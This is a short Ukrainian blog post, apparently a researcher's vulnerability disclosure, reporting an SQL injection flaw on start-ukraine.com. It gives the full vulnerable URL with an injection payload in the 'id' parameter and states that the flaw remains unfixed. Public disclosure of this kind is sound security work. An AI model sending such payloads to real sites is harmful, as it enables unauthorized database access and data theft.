Уразливість на www.start-ukraine.com

22:34 09.10.2010

28.01.2010

У червні, 28.06.2009, я знайшов SQL Injection уразливість на сайті http://www.start-ukraine.com. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливість з’явиться пізніше.

09.10.2010

SQL Injection:

http://www.start-ukraine.com/start.php?action=show&lng=ukr&db=news&id=-1%20or%20version()=5

Дана уразливість досі не виправлена.


Leave a Reply

You must be logged in to post a comment.